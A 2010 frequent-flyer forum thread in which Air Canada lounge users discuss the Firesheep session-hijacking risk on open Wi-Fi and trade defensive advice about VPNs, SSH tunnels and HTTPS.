Go Back  FlyerTalk Forums > Miles&Points > Airlines and Mileage Programs > Air Canada | Aeroplan
Reload this Page >

MLL, Firesheep, and do you really think you are secure?

MLL, Firesheep, and do you really think you are secure?

Old Nov 4, 10, 2:19 pm
  #1  
Original Poster
 
Join Date: Apr 2000
Location: Mississauga Ontario
Posts: 3,689
MLL, Firesheep, and do you really think you are secure?

Theoretically, someone could sit in a MLL somewhere, and open FireFox, and run Firesheep, and from there:

-- log into the Facebook accounts of multiple people who are in the MLL RIGHT NOW

-- access the WSJ account of someone who is logged into the MLL right now

... and access other accounts which are accessed in the clear through non-encrypted connections.

Entirely theoretical. But suppose someone was reading your account right now?

If you haven't heard of Firesheep in the last week, and you are using any http:// connection for things through unprotected Wi-Fi, do you really think you are secure?

It could be something to think about. Entirely theoretical, of course.
InTheAirGuy is offline  
Old Nov 4, 10, 2:43 pm
  #2  
 
Join Date: Oct 2008
Location: YYC
Programs: AC SE100K, Hyatt Globalist
Posts: 4,033
Not theoretical at all. This is a huge risk for individuals and smaller companies that don't have the resources/knowledge to implement properly secured systems.

I use and recommend WiTopia (http://www.witopia.net), a personal VPN that is useful both for unsecured wireless connections and for all connections in countries that have many prying eyes.
rehoult is offline  
Old Nov 4, 10, 4:22 pm
  #3  
 
Join Date: Sep 2010
Location: Earth
Programs: AC S100K (formerly AC*SE), AC 2MM, AMEX Plat, Marriott Platinum Elite
Posts: 1,469
Originally Posted by rehoult View Post
Not theoretical at all. This is a huge risk for individuals and smaller companies that don't have the resources/knowledge to implement properly secured systems.

I use and recommend WiTopia (http://www.witopia.net), a personal VPN that is useful both for unsecured wireless connections and for all connections in countries that have many prying eyes.
Good tip!
2MM_Guy is offline  
Old Nov 4, 10, 6:20 pm
  #4  
 
Join Date: Nov 2001
Location: YYZ
Programs: Earned: AC SE, AA PLT - Comped: DL PLT, Avis PC, Hertz Platinum
Posts: 781
Originally Posted by InTheAirGuy View Post
Theoretically, someone could sit in a MLL somewhere, and open FireFox, and run Firesheep, and from there:

-- log into the Facebook accounts of multiple people who are in the MLL RIGHT NOW

-- access the WSJ account of someone who is logged into the MLL right now

... and access other accounts which are accessed in the clear through non-encrypted connections.

Entirely theoretical. But suppose someone was reading your account right now?

If you haven't heard of Firesheep in the last week, and you are using any http:// connection for things through unprotected Wi-Fi, do you really think you are secure?

It could be something to think about. Entirely theoretical, of course.
Of course, this is nothing new, and was all very possible before firesheep was released.. It just lowered the barrier to entry for who can do it...

However, anybody has been able to packet sniff http connections on wifi networks for a very, very long time.
mattm00se is offline  
Old Nov 4, 10, 7:24 pm
  #5  
 
Join Date: Jul 2008
Programs: Via Preference Privilege, AC*A, Fairmont Plat, SPG Gold
Posts: 1,333
I use and recommend WiTopia (http://www.witopia.net), a personal VPN that is useful both for unsecured wireless connections and for all connections in countries that have many prying eyes.
All this does is change the point of attack. Your trusting a VPN provider to not sniff out your sessionid and use your Facebook account. The real solution is sites have to start sending the sessionid over SSL, and hopefully this will push them to do so.
will5404 is offline  
Old Nov 4, 10, 8:06 pm
  #6  
 
Join Date: Oct 2008
Location: YYC
Programs: AC SE100K, Hyatt Globalist
Posts: 4,033
Originally Posted by will5404 View Post
All this does is change the point of attack. Your trusting a VPN provider to not sniff out your sessionid and use your Facebook account. The real solution is sites have to start sending the sessionid over SSL, and hopefully this will push them to do so.
That is true, but there is too much competition in the VPN field for any sane provider to risk cheating their customers. They'd be out of business overnight. I'm not a shill for them (only a user), but I think they say it best:

The bottom line is, compared to your Internet provider, a hotspot/network owner, or even a government, we have a vested interest in vigorously maintaining your data security and privacy.

After all, that is what you pay us to do.

Not to be too capitalistic or simplistic about it, but that really is quite an incentive. This is how we earn our livelihoods. We dont sell ads. We dont have side jobs. This is it. You pay us money and we do everything we can to provide you the best service and protection possible.

If we dont do it well, or somehow betrayed your trust, wed guess youd go elsewhere in an Internet minute. Knowing that, we will strive to earn your trust every single day and, hopefully, year after year.
rehoult is offline  
Old Nov 4, 10, 9:42 pm
  #7  
 
Join Date: Jan 2009
Location: YYZ
Posts: 108
Its sad that websites haven't broadly deployed SSL and STS.

Anyone that has fired up backtrack in a public place has soon learnt... once you see all the twisted pages people around you are loading up... ignorance can be bliss. Especially if i'm spending 15 hours strapped into a pressurized metal tube with my wifi neighbors.

Anyone tried this on AirCell's GoGo? "Ladies and gentlemen, Air Canada would like to remind you that complaining about our craptastic IFE system from FL370 is just as distasteful as snooping your seat mate's session cookies. Stolen facebook accounts are complimentary for passengers in the Executive cabin, and are available to passengers in economy for $6"
dcottom is offline  
Old Nov 5, 10, 12:09 am
  #8  
 
Join Date: Jul 2007
Location: Vancouver, BC
Programs: AE, SPG, HH
Posts: 340
SSL is more processor intensive as well as uses slightly more bandwidth. Not sure if this is why it hasn't been implemented on a lot of websites but you can definitely use it with facebook.

As others have suggested, a private VPN session or an SSH tunnel will work. I use VyprVPN by Giganews whenever I'm in a public hotspot. Ultimately there's no true solution for privacy as everything can be broken down - including a wired connection. Anyone that's used wireshark could've been able to see all this data that Firesheep is showing - Firesheep just makes it that much easier and requires less tech knowledge than wireshark (at least that's what I'm assuming seeing as it's getting this much publicity.)

Want to protect yourself? Don't use a hotspot you don't trust. Don't use a hotspot that doesn't employ any form of encryption. Use a VPN session, SSH tunnel or at the very least SSL websites. Don't know if your website supports ssl? change the "http://" to "https://" and see if it loads. If it does, you're in business, if not see option #1 or #2.

Security's my thing!
helraiser is offline  
Old Nov 5, 10, 10:57 am
  #9  
 
Join Date: Jan 2009
Location: YYZ
Posts: 108
The annoying thing is sites, (i.e. facebook) that give you an SSL login, then redirect you back to straight up http for the rest, blasting your session cookies around in clear text. Undoubtedly its about money and infrastructure, both things SSL certs require more of.

It would be nice if the new datavalet portal in the MLL could be upgraded to allow WPA connections similar to some of the wifi providers you see in HKG and NRT? ...sign in with your E/SE number and it farts back / sms you a pass phrase for the protected network...
dcottom is offline  
Old Nov 5, 10, 2:52 pm
  #10  
 
Join Date: Jun 2003
Location: YVR
Programs: AC E75, SPG Plat, HH peon-by-choice (ex Gold)
Posts: 8,090
That's why I only use wired access in lounges and never login to anything on unprotected wifi networks.
Braindrain is offline  
Old Nov 5, 10, 8:44 pm
  #11  
 
Join Date: Oct 2006
Location: YYZ/DLC
Programs: AP, CX Gold, HHonours Gold, SPG Gold, KL/AF Gold
Posts: 3,679
Originally Posted by Braindrain View Post
That's why I only use wired access in lounges and never login to anything on unprotected wifi networks.
You and I have the same habit! Nothing is absolute, but Ethernet will fend off most of the casual Joe-Hackers.
payam81 is offline  

Thread Tools
Search this Thread